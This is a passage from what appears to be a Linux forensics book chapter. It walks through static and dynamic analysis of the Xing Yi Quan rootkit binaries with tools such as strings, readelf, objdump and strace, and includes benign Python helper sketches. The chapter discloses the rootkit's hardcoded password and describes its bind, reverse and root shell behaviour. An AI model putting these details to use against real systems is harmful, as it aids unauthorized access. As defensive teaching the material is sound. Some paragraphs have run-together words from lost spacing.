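    altered = bytearray(data)
    altered[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(altered)


# Made-up stand-in for a value that is hard coded at build time.
sample = b'#define PASSWORD "placeholder"\n'
print("original:", hashes_of_bytes(sample))
print("one bit :", hashes_of_bytes(flip_bit(sample, 0)))
```

Because the two digests share nothing recognizable, a binary rebuilt on the victim machine with a different password will not match a hash registry entry for the same malware family.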

The National Institute of Standards and Technology (NIST) maintains a large database of hashes known as the National Software Reference Library (NSRL). At present there are over 40 million MD5 hashes in this database. Updates to NSRL are released four times a year. In order to avoid the need to download this massive 6 GB database and get more frequent updates, a query server has been set up.

Using the NSRL query server requires the installation of a program known as nsrllookup. This program can be obtained from the following URL on GitHub: https://github.com/rjhansen/nsrllookup/archive/v1.2.3.tar.gz. This program is very easy to use. Simply pipe an MD5 hash to it like so: md5sum <suspicious file> | nsrllookup. If the hash is unknown, it will be echoed back to you. If you prefer to see only known hashes, add the -k flag. Running nsrllookup against a set of files is shown in Figure 10.3.

FIGURE 10.3

Running nsrllookup against a list of files. None of the files in this directory are in the NSRL, as can be seen by running nsrllookup with the -k switch.

The NSRL contains known files, both good and bad. If you do get a hit, you will need to get the details from the NSRL website to decide if a file is malicious or benign. These queries can be performed at http://www.hashsets.com/nsrl/search. An example known-good Linux binary is shown in Figure 10.4.

FIGURE 10.4

An entry in the NSRL Reference Data Set (RDS) for a known Linux binary.

Using strings

In most cases your file will not be listed in the MHR or NSRL. These databases are best used to whittle down the files to be examined if you have lots of suspect files. The strings utility will search a binary file for ASCII text and display whatever it finds. The syntax for the command is strings -a <suspicious file>. Partial results from running the command strings -a xingyi_bindshell are shown in Figure 10.5. Pathnames to temporary files and what could be a password are highlighted in the figure.

FIGURE 10.5

Running strings on a suspicious binary.

You may want to capture the output from strings to a file. Any strange and unique words, such as "sw0rdm4n" and "xingyi", can be used for Google searches. You may see several strings of the form <function>@@<library> that can tell you what library functions are being used in this code. You will only see these strings if debugging symbols have not been removed with strip. The results of running strings xingyi_bindshell | grep @@ | sort are shown in Figure 10.6.

FIGURE 10.6

Displaying library functions with strings. Note that this only works for binaries that haven't been stripped.
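What strings does can be approximated in a few lines of Python, which is handy when the results need further filtering. This sketch looks for runs of at least four printable ASCII characters, which is an approximation of the real utility's default behavior rather than a replacement for it. The sample bytes are made up; the @@ entry merely illustrates the <function>@@<library> form described above.

```python
import re


def ascii_strings(data, min_length=4):
    """Return runs of printable ASCII (0x20 to 0x7e) at least min_length long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_length)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]


def library_functions(strings_found):
    """Keep only entries of the form <function>@@<library>, sorted by name."""
    return sorted(s for s in strings_found if "@@" in s)


# Made-up bytes standing in for the contents of a suspicious binary.
sample = b"\x00\x01xingyi\x00ab\x00sw0rdm4n\xffpopen@@GLIBC_2.2.5\x00"

found = ascii_strings(sample)
print(found)
print(library_functions(found))
```

Raising min_length is a quick way to cut down on the random short matches that machine code tends to produce.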

Listing symbol information with nm

The nm utility is used to list symbols from an object (binary) file. This command produces a list of symbols along with their addresses (if applicable) and symbol type. Some of the more prevalent types are shown in Table 10.1. Generally speaking, lowercase type letters denote local symbols and uppercase type letters represent external (global) scope. The output from nm can give some insight into the unknown file, by providing called library functions, local function names, and variable names. Naturally, if these symbols have been stripped using the strip command, nm has no symbols to list. Partial output from running nm against the xingyi_bindshell file is shown in Figure 10.7. Several suspicious function and variable names can be seen in the figure.

Table 10.1. Common nm symbol types.

Type    Description
A       Absolute (will not change)
B       Uninitialized data section (BSS)
C       Common symbol (uninitialized data)
D       Symbol is in the initialized data section
G       Symbol is in an initialized data section for small objects
N       Symbol is a debugging symbol
R       Symbol is in read-only data section
S       Symbol is in uninitialized data section for small objects
T       Symbol is in the code (text) section
U       Symbol is undefined. Usually this means it is external (from a library)
V, W    Weak symbol (can be overridden)
?       Unknown symbol type

FIGURE 10.7

Partial output from running nm against xingyi_bindshell.

Listing shared libraries with ldd

Most of the previous sections came with the caveat that these tools rely on binaries that haven't been stripped. Stripping binaries is a common practice for a couple of reasons. First, removing the symbols can result in a significantly smaller executable. Second, stripping the file makes it harder to reverse engineer (whether or not it is malware). What can you do if the file has been stripped?

If shared libraries are used (which is almost certainly the case), then the program must be able to find them. Also, the names of any functions used in shared libraries must be somewhere in the program. The net of this, assuming no obfuscation techniques have been employed, is that the strings command will tell you the names of functions called and ldd will tell you shared libraries used. The names of the shared libraries cannot easily be obfuscated since doing so would cause the program's build process (specifically, the last step called linking) to fail.

The syntax for ldd is simply ldd <binary>. The results of running ldd against xingyi_bindshell and a stripped copy of the same are shown in Figure 10.8. Note that the results are identical. The file command was also run on one of the shared libraries, libc-2.19.so. There are two versions of this library, one with debugging symbols and one without.

FIGURE 10.8

Running ldd against a binary and the same binary that has been stripped of all symbols.

I THINK IT IS MALWARE

If checking a few hash databases and Googling some of the words you found in the file produces no results, it is time to dig deeper into the file. A natural place to start would be examining the overall file structure. Once you have a high-level view of what is going on, you can start drilling down and looking at the actual code if required.

Getting the big picture with readelf

Linux executables are in the Executable and Linkable Format (ELF). An ELF file is an object file, which can be viewed in two different ways, depending on what you are trying to do with it. Figure 10.9 shows the two views and different parts of the file that are relevant to each view.

FIGURE 10.9

The two views of an ELF file.

As shown in Figure 10.9, all ELF files have a header. When the file is being executed, the Program Header Table (PHT) that follows the header is read. The PHT describes various segments (large chunks) in the file. In the linking view the PHT is ignored and the Section Header Table (SHT) at the end of the file is read. The SHT describes various sections (which are subparts of segments) in the file.

The readelf utility parses different parts of an ELF file. Thanks to this handy program, there is little need to dig into the details of the ELF structures. The command readelf --file-header <file> will display the header information. The results of running this command against xingyi_bindshell are shown in Figure 10.10. From the figure, we see this is a 64-bit executable with nine program headers and thirty section headers. All ELF files begin with the "magic number" 0x7F, followed by the string "ELF", or just 0x7F 0x45 0x4C 0x46 in hexadecimal.

FIGURE 10.10

The ELF header information for xingyi_bindshell.
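To make the header layout a little more concrete, the following Python sketch checks the magic number and pulls a few fields out of a 64-bit little-endian ELF header using the standard struct module. It is only an illustration of what readelf does for you. The synthetic header it builds reuses the nine program headers and thirty section headers reported for xingyi_bindshell, but the entry point, offsets, and string table index are placeholders, and the function names are hypothetical.

```python
import struct

ELF_MAGIC = b"\x7fELF"
# e_ident, e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
# e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
ELF64_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")


def parse_elf64_header(data):
    """Return selected fields from a 64-bit little-endian ELF header."""
    if len(data) < ELF64_HEADER.size:
        raise ValueError("too short to hold an ELF64 header")
    if data[:4] != ELF_MAGIC:
        raise ValueError("missing ELF magic number")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("this sketch only handles 64-bit little-endian files")
    fields = ELF64_HEADER.unpack_from(data)
    return {
        "type": fields[1],
        "machine": fields[2],
        "entry": fields[4],
        "program_headers": fields[10],
        "section_headers": fields[12],
    }


def build_sample_header():
    """Build a synthetic header; addresses and offsets are placeholders."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + bytes(8)
    return ELF64_HEADER.pack(
        ident, 2, 62, 1,            # ET_EXEC, EM_X86_64, version 1
        0x400E00, 64, 0x3000, 0,    # placeholder entry point and offsets
        64, 56, 9, 64, 30, 29,      # 9 program headers, 30 section headers
    )


print(parse_elf64_header(build_sample_header()))
```

To try it on a real file, read the first 64 bytes in binary mode and pass them to parse_elf64_header.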

The readelf --section-headers <file> command is used to display section information. The output from running readelf --section-headers -W xingyi_bindshell is shown in Figure 10.11. The -W option specifies wide format (not restricted to 80 characters of width). The sections are described in Table 10.2. The sections from this file are fairly typical.

FIGURE 10.11

Sections from the xingyi_bindshell file.

Table 10.2. Sections from xingyi_bindshell.

Name                  Description
Null
.interp               Dynamic linker name
.note.ABI-tag         Note containing "GNU" followed by architecture information
.note.gnu.build-id    Unique ID that is same for debug and stripped programs (displayed by file)
.gnu.hash             Describes a hash table (don't worry if you don't know what this is)
.dynsym               Symbol table for dynamic linking
.dynstr               Strings that are required for dynamic linking
.gnu.version          Symbol Version Table that corresponds to .dynsym
.gnu.version_r        Required symbol version definitions
.rela.dyn             Relocation information for .dynamic
.rela.plt             Relocation information for .plt
.init                 Initialization code for this program
.plt                  Procedure Linkage Table
.text                 The actual executable code (machine code)
.fini                 Termination code for this program
.rodata               Read-only data
.eh_frame_hdr         Exception handling C++ code for accessing .eh_frame
.eh_frame             Exception handling (exceptions are used for error processing)
.init_array           List of initialization code to call on startup
.fini_array           List of termination code to call on termination
.jcr                  Information to register compiled Java classes
.dynamic              Dynamic linking information
.got                  Global Offset Table (used for address resolution during relocation)
.got.plt              Global Offset Table (used for address resolution during relocation)
.data                 Initialized data
.bss                  Uninitialized data
.comment              Comment (normally for version control)
.shstrtab             Section names (section header string table)
.symtab               Symbol Table
.strtab               Symbol Table entry names

Do not be overly concerned if you don't understand all of the sections described in Table 10.2. I would posit that the majority of professional programmers do not know about all of these either. The most important ones for our purposes are .text, .data, and .bss, which contain program code, initialized data, and uninitialized data, respectively. The fact that our file has all these sections suggests that the program was written in C, or similar language, and compiled with GCC (the GNU Compiler Collection). In theory, this should make it easier to reverse engineer than handcrafted Assembly code.

The command readelf --program-headers <file> is used to parse the Program Header Table (PHT). The results of running this command on xingyi_bindshell are shown in Figure 10.12. As can be seen from the figure, most segments consist of a list of sections. Notable exceptions to this are segments 00 and 07, which contain the Program Header Table and stack, respectively. The description of each of these segments can be found in Table 10.3. The PHT also specifies where each segment should be loaded and what byte-alignment it requires.

FIGURE 10.12

Program Header Table for xingyi_bindshell.

Table 10.3. Segments from xingyi_bindshell.

Number and Type      Description
00 - PHDR            Program Header Table
01 - INTERP          Dynamic linker to use (/lib64/ld-linux-x86-64.so.2)
02 - LOAD            Portion of file to load into memory (first one)
03 - LOAD            Portion of file to load into memory (second one)
04 - DYNAMIC         Dynamic linking information
05 - NOTE            Extra information
06 - GNU_EH_FRAME    Exception handling information
07 - GNU_STACK       The program stack
08 - GNU_RELRO       Memory that should be read-only after relocation is done

If a file has not been stripped, readelf can be used to list symbols. Partial output from running readelf --symbols -W xingyi_bindshell is shown in Figure 10.13. Notice that this output is more verbose than that produced by nm. It is also a bit more orderly.

FIGURE 10.13

Partial output from running readelf --symbols against xingyi_bindshell.

Each of the sections may be displayed using the command readelf --hex-dump=<number or name> <file>. This can help you get some insight into the file without having to decipher the different metadata structures yourself. Running this command for a few of the sections in xingyi_bindshell is shown in Figure 10.14. From the figure, we can see the program was compiled with GCC version 4.8.2-19 for Ubuntu, should be loaded with /lib64/ld-linux-x86-64.so.2, and has the SHA Build ID of 12c43054c53c2e67b668eb566ed7cdb747d9dfda. It is probably best to avoid running this command on sections containing code as these will not be displayed in a meaningful manner. In the next section, we will cover a better tool for examining executable code.

FIGURE 10.14

Dumping a few sections from xingyi_bindshell with readelf --hex-dump.

Using objdump to disassemble code

The objdump utility can be used to get information from an object file. Much of its functionality duplicates that of readelf. One useful feature not found in readelf is the ability to disassemble object code (convert it from pure machine code to more human-readable Assembly). There are two common formats for Assembly code: Intel and AT&T. The default is to use AT&T syntax, but this can be changed using the "-M intel" option. The Intel format seems to be preferred by PC programmers. It is important to realize that disassembly with a tool like this is not perfect, as any data in the sections normally containing code will be interpreted as machine code instructions.

The command objdump --disassemble -M intel xingyi_bindshell will disassemble the sections of the file normally expected to contain code. Partial results from running this command are shown in Figure 10.15. The snippet shown is part of the main method of the program. While a complete Assembly tutorial is well out of scope for this book, an introduction to the basics can be helpful in understanding this code. Assuming the code has not been intentionally obfuscated, only a basic understanding of Assembly is required to get the gist of what is going on.

Assembly language instructions are pretty basic. They mostly consist of moving things around; simple math like addition, subtraction, and multiplication; comparing numbers; jumping to new memory addresses; and calling functions. For commands that move things around, the source and target can be memory locations or high-speed storage areas in the CPU called registers.

Some of these registers have a special purpose, and the rest are used for performing calculations or passing variables to functions. Some of the registers have been around since the 16-bit processors of old (8086, 80286), others were added when 32-bit processors were released (80386 and newer), while still others were added when AMD released the first 64-bit processors. Standard 64-bit processor registers are shown in Figure 10.16. The legacy registers are named based on width. XX, EXX, and RXX denote 16-bit, 32-bit, and 64-bit wide registers, respectively. Some 16-bit registers can be further divided into XH and XL for the high and low bytes, respectively. Using the RAX register as an example, AL, AX, EAX, and RAX represent the lowest byte, two bytes, four bytes, and all eight bytes of the register, respectively. When viewing Assembly code, you will often see different width registers used based on need.
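The relationship between these overlapping register names amounts to bit masking, which the short Python sketch below illustrates. The 64-bit value and the function name register_views are arbitrary choices made for the example.

```python
def register_views(rax):
    """Show the narrower registers that alias the low bits of RAX."""
    rax &= 0xFFFFFFFFFFFFFFFF          # keep the value to 64 bits
    return {
        "RAX": rax,                    # all eight bytes
        "EAX": rax & 0xFFFFFFFF,       # lowest four bytes
        "AX": rax & 0xFFFF,            # lowest two bytes
        "AH": (rax >> 8) & 0xFF,       # high byte of AX
        "AL": rax & 0xFF,              # lowest byte
    }


# Arbitrary example value, chosen so that every byte is different.
for name, value in register_views(0x1122334455667788).items():
    print(f"{name:>3} = 0x{value:x}")
```

With the example value, EAX is 0x55667788, AX is 0x7788, AH is 0x77, and AL is 0x88.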

The RIP (or EIP for 32-bit Assembly) register is known as the instruction pointer. It points to the address in memory where the next instruction to be run can be found. The RFLAGS register is used to keep track of status of comparisons, whether or not a mathematical operation resulted in a need to carry a bit, etc. The RBP register is known as the base pointer, and it points to the base (bottom) of the current stack frame. The RSP register is called the stack pointer, and it points to the top of the current stack frame. So what is a stack frame?

A stack frame is a piece of the stack which is associated with the currently running function in a program. So, what then is a stack? The stack is a special memory area that grows each time a new function is called via the Assembly CALL instruction and shrinks when this function completes. In C and similar languages you will hear people talk about stack variables that are automatically created when declared and go away at the end of their code block. These variables are allocated on the stack. When you think about what a function is, it is always a code block of some type. The local variables for functions are typically allocated on the stack.

When larger amounts of storage are required or variables need to live beyond a single function, variables may be created on the heap. The mechanism for getting heap space differs from one programming language to the next. If you look at the internals of how the operating system itself creates heaps and doles out memory to various processes, it is actually quite complex.

When reverse engineering applications in order to find vulnerabilities, the stack and heap play a central role in the process. For our purposes it is sufficient to understand that the stack is the most common place for functions to store their local variables. If you look back at Figure 10.15, you will see that the first instruction, push rbp, is used to save the current base pointer (bottom of the stack frame) to the stack. The current stack pointer is then moved to the base pointer with the command mov rbp, rsp (recall that the target is on the left and source on the right in Intel notation). On the next line the current value stored in RBX is saved by pushing it onto the stack. On the next line 0x88 is subtracted from the stack pointer with the instruction sub rsp, 0x88.

FIGURE 10.15

Partial results from disassembling xingyi_bindshell with objdump.

You might be thinking, "Hold on a second, why did I subtract to grow the stack?" The reason for this is that the stack grows downward (from high memory addresses to low memory addresses). By moving the old stack pointer (in RSP) to the base pointer (RBP), the old top of the stack frame has become the new bottom. Subtracting 0x88 from the stack pointer allocates 0x88 bytes for the current stack frame. This new storage is used by the current function. If you look at Figure 10.15, you will see several mov instructions that move values into this newly allocated stack buffer. The destinations for all of these moves are memory addresses contained in the square brackets, which are all of the form [rbp - <some offset>].

There is also an odd instruction, xor eax, eax, among the move instructions. The bitwise exclusive-OR (XOR) operator compares each bit in two numbers, and the corresponding bit in the result is 1 if either, but not both, of the input values had a 1 in that position. The effect of XORing any number with itself is the same as setting that number to zero. Therefore, xor eax, eax is the same as mov eax, 0x0. Readers who have done any shell coding will realize that use of XOR is preferred in that situation as it prevents a zero byte (which is interpreted as a NULL in many cases) from being present in code you are trying to inject.
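Both points can be checked with a few lines of Python. The byte sequences below are the common x86 encodings of the two instructions (31 C0 for xor eax, eax and B8 followed by a four-byte immediate for mov eax, 0x0); they are supplied here for illustration and are not taken from the figure.

```python
def xor_bits(a, b, width=32):
    """Bitwise exclusive-OR of two values, limited to the given register width."""
    return (a ^ b) & ((1 << width) - 1)


# Common encodings of the two equivalent instructions.
XOR_EAX_EAX = bytes([0x31, 0xC0])                    # xor eax, eax
MOV_EAX_ZERO = bytes([0xB8, 0x00, 0x00, 0x00, 0x00])  # mov eax, 0x0

# A bit is set in the result only where the inputs differ.
print(bin(xor_bits(0b1100, 0b1010)))

# Any value XORed with itself is zero.
print(xor_bits(0xDEADBEEF, 0xDEADBEEF))

# Only the mov encoding contains zero bytes.
print(0 in XOR_EAX_EAX, 0 in MOV_EAX_ZERO)
```

The XOR form is also three bytes shorter, which is one reason compilers routinely emit it even when zero bytes are not a concern.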

Following the block of move instructions we see a call instruction. In high level languages calling a function and passing in a bunch of parameters is pretty simple. How does this work in Assembly? There needs to be a calling convention in place that dictates how parameters are passed into and out of a function. For various technical reasons, multiple calling conventions are used based on the type of function being called. 32-bit systems normally pass in parameters on the stack (ordered from right to left). 64-bit systems normally pass in parameters in the registers RDI, RSI, RDX, RCX, R8, R9, and place any additional parameters on the stack (also ordered right to left). Return values are stored in EAX/EDX and RAX/RDX for 32-bit and 64-bit systems, respectively. One of the reasons that there are multiple calling conventions is that some functions (such as printf in C) can take a variable number of arguments. In addition to specifying where parameters are stored, a calling convention defines who is responsible (caller or callee) for returning the stack and CPU registers to their previous state just before the function was called.
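The 64-bit rule described above can be modeled in a few lines of Python. This sketch only covers integer and pointer arguments, which is a simplification: floating point values travel in different registers. The function name place_arguments is hypothetical.

```python
INTEGER_ARG_REGISTERS = ("RDI", "RSI", "RDX", "RCX", "R8", "R9")


def place_arguments(args):
    """Model where integer or pointer arguments go on a 64-bit Linux system.

    The first six arguments are assigned to registers in order. Any others
    go on the stack and are pushed right to left, so the last argument is
    pushed first.
    """
    in_registers = dict(zip(INTEGER_ARG_REGISTERS, args))
    push_order = list(reversed(args[len(INTEGER_ARG_REGISTERS):]))
    return in_registers, push_order


# A call with one argument only needs RDI.
print(place_arguments([0x100]))

# A call with eight arguments spills the seventh and eighth to the stack.
print(place_arguments([1, 2, 3, 4, 5, 6, 7, 8]))
```

When reading a disassembly, this means the instructions that load RDI, RSI, and so on just before a call usually reveal the arguments being passed.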

Armed with the knowledge from the previous paragraph, we can see the two lines, mov edi, 0x100 and call <n_malloc>, are used to call the n_malloc function with a single parameter whose value is 0x100 (256). The return value, a pointer to memory allocated on the heap, is then stored on the stack frame on the next line, mov QWORD PTR [rbp-0x58], rax. On the lines that follow, the putchar and popen functions are called.

The return value from the call to popen is stored in the stack frame on the line mov QWORD PTR [rbp-0x70], rax. The next line compares the return value with zero. If the return value was zero, the line je 400fe7 <main+0xbc> causes execution to jump to 0x400FE7. Otherwise, execution continues on the next line at 0x400FB2. Note that the machine code is 0x74 0x35. This is known as a short conditional jump instruction (opcode is 0x74) that tells the computer to jump forward 0x35 bytes if the condition is met. Objdump did the math for you (0x400FB2 + 0x35 = 0x400FE7), and also told you this location was 0xBC bytes from the start of the main function. There are other kinds of jumps available, for different conditions or no condition at all, and for longer distances.
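The arithmetic objdump performs for a short jump can be reproduced as follows. The address of the je instruction itself (0x400FB0) is not quoted in the text; it is inferred here from the fact that the instruction is two bytes long and the next instruction sits at 0x400FB2. The function name is hypothetical.

```python
def short_jump_target(instruction_address, machine_code):
    """Compute the destination of a two-byte short jump.

    The second byte is a signed 8-bit displacement that is added to the
    address of the instruction following the jump.
    """
    if len(machine_code) != 2:
        raise ValueError("a short jump is exactly two bytes long")
    displacement = machine_code[1]
    if displacement >= 0x80:           # interpret the byte as signed
        displacement -= 0x100
    next_instruction = instruction_address + len(machine_code)
    return next_instruction + displacement


JE_ADDRESS = 0x400FB0                  # inferred, see the note above
target = short_jump_target(JE_ADDRESS, bytes([0x74, 0x35]))
print(hex(target))                     # 0x400fe7

# objdump labels the target <main+0xbc>, which places the start of main here.
print(hex(target - 0xBC))              # 0x400f2b
```

Because the displacement is signed, the same two-byte form can also jump backward by up to 128 bytes, which is how short loops are typically encoded.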

Other than the return instruction, ret, there is only one remaining Assembly instruction found in the main function that has not yet been discussed. This instruction is not in the snippet from Figure 10.15. This instruction is lea, which stands for Load Effective Address. This instruction performs whatever calculations you pass it and stores the results in a register. There are a few differences between this instruction and most of the others. First, you may have more than two operands. Second, if some of the operands are registers, their values are not changed during the operation. Third, the result can be stored in any register, including registers not used as operands. For example, lea rax, [rbp-0x50] will load the value of the base pointer minus 0x50 (80) in the RAX register.

FIGURE 10.16

Registers for modern 64-bit processors.

The end of the disassembly of the main function by objdump is shown in Figure 10.17. The highlighted lines are cleanup code used to return the stack and registers to their previous state. Notice that we add back the 0x88 that was subtracted from RSP at the beginning of the function, and then pop RBX and RBP off the stack in the reverse order from how they were pushed on. Note that in the calling convention used here, it is the callee (main function in this case) that is responsible for restoring registers and the stack to their previous state. Functions (such as printf) that accept a variable number of parameters require a different calling convention, in which the caller must perform the cleanup, as the callee does not know what will be passed into the function.

FIGURE 10.17

Cleanup code at the end of the main function. Note that the lines after the ret instruction are probably data, not instructions as depicted.
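The setup and cleanup sequences mirror each other, which a small simulation makes easy to see. The Python sketch below models only RSP, RBP, RBX, and the stack memory. The starting register values are arbitrary placeholders, and the class and function names are hypothetical.

```python
class Stack:
    """A toy model of a downward-growing stack of 8-byte slots."""

    def __init__(self, rsp):
        self.rsp = rsp
        self.memory = {}

    def push(self, value):
        self.rsp -= 8                  # the stack grows toward lower addresses
        self.memory[self.rsp] = value

    def pop(self):
        value = self.memory.pop(self.rsp)
        self.rsp += 8
        return value


def run_prologue_and_epilogue(rsp, rbp, rbx, frame_size=0x88):
    """Replay the setup and cleanup instructions discussed in the text."""
    stack = Stack(rsp)
    stack.push(rbp)                    # push rbp
    frame_base = stack.rsp             # mov rbp, rsp
    stack.push(rbx)                    # push rbx
    stack.rsp -= frame_size            # sub rsp, 0x88
    lowest_rsp = stack.rsp
    # ... the function body would run here and may overwrite RBX ...
    stack.rsp += frame_size            # add rsp, 0x88
    restored_rbx = stack.pop()         # pop rbx
    restored_rbp = stack.pop()         # pop rbp
    return {
        "frame_base": frame_base,
        "lowest_rsp": lowest_rsp,
        "final_rsp": stack.rsp,
        "rbx": restored_rbx,
        "rbp": restored_rbp,
    }


# Placeholder starting values for the three registers.
state = run_prologue_and_epilogue(rsp=0x7FFC0000, rbp=0x7FFC0040, rbx=0x1234)
print({name: hex(value) for name, value in state.items()})
```

After the cleanup, RSP, RBP, and RBX hold exactly the values they had on entry, which is what the caller expects when ret hands control back.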

The bytes after the return instruction have been misinterpreted as machine code instructions by objdump. Later when we use the GNU Debugger (gdb) to disassemble the program, all of the program will be disassembled properly. For this reason, we will delay providing the full output from objdump here.

Up to this point we have been discussing what is known as static analysis. This is essentially dead analysis of a program that is not running. While using a tool like objdump to disassemble a program might lead to some minor errors, it is safe because the program is never executed on your forensics workstation. Often this is sufficient, if your primary goal is to determine if a file is malicious or benign. You certainly could use a tool such as gdb to get a more accurate disassembly of an unknown executable, but be careful not to run the program in the debugger on your forensics workstation!

DYNAMIC ANALYSIS

Dynamic analysis involves actually running a program to see what it does. There are a number of tools that you can use to analyze an unknown program's behavior. Before we proceed, we need to talk about safety. Think about it. Does running an unknown, possibly malicious program on your forensics workstation sound like a good idea? You have two basic choices. Either you can use some spare hardware that is disconnected from the network and only used for examining unknown files, or you can set up a virtual machine using VirtualBox, VMWare, or other virtualization software.

The separate machine is the safest option. This allows you to run the programwith

recklessabandon,knowing thatyouwill re-image themachinewhenyouaredonewithyour analysis.Virtualization is definitelymore convenient, but there is potential risk toyourhostmachine ifyoumisconfigure thevirtualmachine. Ifyoudousevirtualization,makesure thatyouhavenonetworkconnections to thevirtualmachine.Also,beawarethatsomesmartmalwarewilldetectthatitisbeingruninsideavirtualmachineandrefuseto run or, even worse, attempt to exploit possible vulnerabilities in the virtualizationsoftwaretoattackthehostmachine.

If you need an image for your virtualmachine, you could use a fresh install of yourfavoriteLinuxdistribution.Ifyouthinkyouwillbeinvestigatingunknownbinariesoften,youmight consider backing up the virtual disk file after you have installed all of yourtools and before transferring any unknown files to the virtualmachine.Remember thatmostvirtualizationsoftwarewillinstallaNATnetworkinterfaceouttotheInternetwhichyoushoulddisable! Ifyou reallywant toduplicate the subject system,youcancreateavirtualmachinefromthesubjectdisk image.Thisassumes thatyouhavesufficientdiskspace,RAM,etc.Thecommandtoconverttherawimagetoavirtualharddiskfile,ifyouare using VirtualBox, is vboxmanage internalcommands converthd -srcformat raw -dstformat vhd <raw image> <destination vhdfile>. ThePAS subject system running in a virtualmachine (without networking!) isshowninFigure10.18.

FIGURE10.18

RunningthePASsubjectsysteminaVMafterconvertingtherawimagetoaVHDfile.
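If you convert images regularly, it can help to build the conversion command in one place so that the same options are used every time. The following is a minimal Python sketch and not one of the book's scripts. The function name build_convert_command and the sample file names are hypothetical; the options are exactly those given in the command above. The sketch only builds and prints the command.

```python
import shlex


def build_convert_command(raw_image, vhd_file):
    """Return the VirtualBox conversion command from the text as an argument list."""
    return [
        "vboxmanage", "internalcommands", "converthd",
        "-srcformat", "raw",
        "-dstformat", "vhd",
        raw_image, vhd_file,
    ]


if __name__ == "__main__":
    # Hypothetical file names, for illustration only.
    cmd = build_convert_command("pas-subject.img", "pas-subject.vhd")
    # Print a copy-and-paste friendly version; nothing is executed here.
    print(" ".join(shlex.quote(part) for part in cmd))
```

To actually run the conversion, the list could be passed to subprocess.run(cmd, check=True). As always, work from a copy of the image and never from the original evidence.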

Tracing system calls

The strace utility can be used to trace which system calls are being made by a program. It works by running a program and keeping track of (tracing) any system calls that are made. Never run this command against an unknown binary on your forensics workstation. Only run this inside a sandbox in a virtual machine or on your dedicated machine for malware investigation described above. In addition to being cautious when running this command, there are a few things that you should keep in mind. First, when you run the program as anyone other than root, it might fail because of permission issues. Second, if command line parameters are required, it might fail, or at least take a different execution path, which can make it hard to see what it does. Third, it may require some libraries not installed in your test environment. If this is the case, you should be able to tell, because you will see system calls attempting to load the libraries. Partial output from running strace against xingyi_bindshell is shown in Figure 10.19.

FIGURE 10.19

Partial output from running strace against xingyi_bindshell in a sandbox virtual machine.

From Figure 10.19 we can see that the C library (/lib/x86_64-linux-gnu/libc.so.6) was opened read-only and the call returned a file handle of 3. The file was read and parts of it were mapped to memory so that some of the functions in the library can be used. Three file handles automatically exist for all programs: 0, 1, and 2, for standard in (stdin), standard out (stdout), and standard error (stderr), respectively. This is why the first file opened by the program received handle 3. The call to write(1, "\n", 1) is the same as calling printf("\n") from a C program (which is exactly what this file is). The output from strace also shows that a pipe was created using popen. Popen stands for pipe open. It is used to execute a command and then open a pipe to get the responses from the command. From the read command that follows a few lines later, it looks like the program is trying to determine the version of Python installed.
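When strace output runs to hundreds of lines, a few lines of Python can pull out the calls of interest. The following is a rough sketch, assuming the output was saved to a text file and that each line has the usual name(arguments) = result shape. The function names and the sample lines are hypothetical; the sample lines are modeled on the calls described above and are not copied from the figure.

```python
import re

# Matches lines such as: open("/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
SYSCALL_RE = re.compile(r'^(?P<name>\w+)\((?P<args>.*)\)\s+=\s+(?P<ret>-?\d+)')


def parse_strace_line(line):
    """Return (syscall name, raw argument string, return value) or None."""
    match = SYSCALL_RE.match(line.strip())
    if match is None:
        return None
    return match.group("name"), match.group("args"), int(match.group("ret"))


def opened_files(lines):
    """Map each descriptor returned by a successful open/openat to its path."""
    result = {}
    for line in lines:
        parsed = parse_strace_line(line)
        if parsed and parsed[0] in ("open", "openat") and parsed[2] >= 0:
            path = re.search(r'"([^"]*)"', parsed[1])
            if path:
                result[parsed[2]] = path.group(1)
    return result


if __name__ == "__main__":
    # Hypothetical sample lines for illustration.
    sample = [
        'open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3',
        'write(1, "\\n", 1) = 1',
    ]
    print(opened_files(sample))
```

Failed calls (those returning -1) are skipped, so the result lists only files the program actually managed to open.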

Don't think of strace as the perfect tool to help you understand how a program works. The best way to see what a program does is to trace through it with gdb. Using strace is a good starting place before moving on to gdb. The results of running strace against another Xing Yi Quan binary, xingyi_rootshell, with no command line arguments are shown in Figure 10.20. Note that the program terminated with a "wrong password" message. Rerunning this command with the "sw0rdm4n" password we discovered during static analysis leads to the results shown in Figure 10.21.

FIGURE 10.20

Running strace against xingyi_rootshell without a password.

FIGURE 10.21

Running strace against xingyi_rootshell with the correct password supplied.

If we run strace against xingyi_reverse_shell with no arguments, it generates an error. If we add the IP address 127.0.0.1 to the command, it succeeds and creates a process listening on port 7777, as shown in Figure 10.22.

FIGURE 10.22

Running strace against xingyi_reverse_shell 127.0.0.1. A process listening on port 7777 is created, as confirmed by running nmap.
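If nmap is not installed in your sandbox, a listening port can also be confirmed with a few lines of Python. This is a minimal sketch, assuming a plain TCP listener. The function name is_listening is hypothetical, and the port number is the one reported above.

```python
import socket


def is_listening(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Connection refused, timed out, or otherwise unreachable.
        return False


if __name__ == "__main__":
    # Run this inside the sandbox only, after starting the binary there.
    print(is_listening("127.0.0.1", 7777))
```

A successful connection only shows that something accepted it on that port. It does not identify which process owns the socket.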

Tracing library calls

The ltrace utility performs a similar function to strace, except that it is used to trace library calls instead of system calls. The results of running ltrace against xingyi_bindshell are shown in Figure 10.23. We can see that the C library is being loaded, 257 bytes of memory are allocated and then filled with zeros, popen is called to get the Python version, the version returned is 2.7.6, strstr is called and returns zero, fork is used to create a new process, and the program exits.

FIGURE 10.23

Running ltrace against xingyi_bindshell.

The results of running ltrace against xingyi_rootshell with the correct password supplied are shown in Figure 10.24. We can see that the C library is loaded, 18 bytes of memory are allocated and then set to zero, up to 16 characters of a string are stored in a string buffer (probably the password passed in, but we need to trace the program with gdb to verify this), a string is compared to "sw0rdm4n" and found to be identical, a file descriptor is duplicated, and a bash shell is created using the C system function.

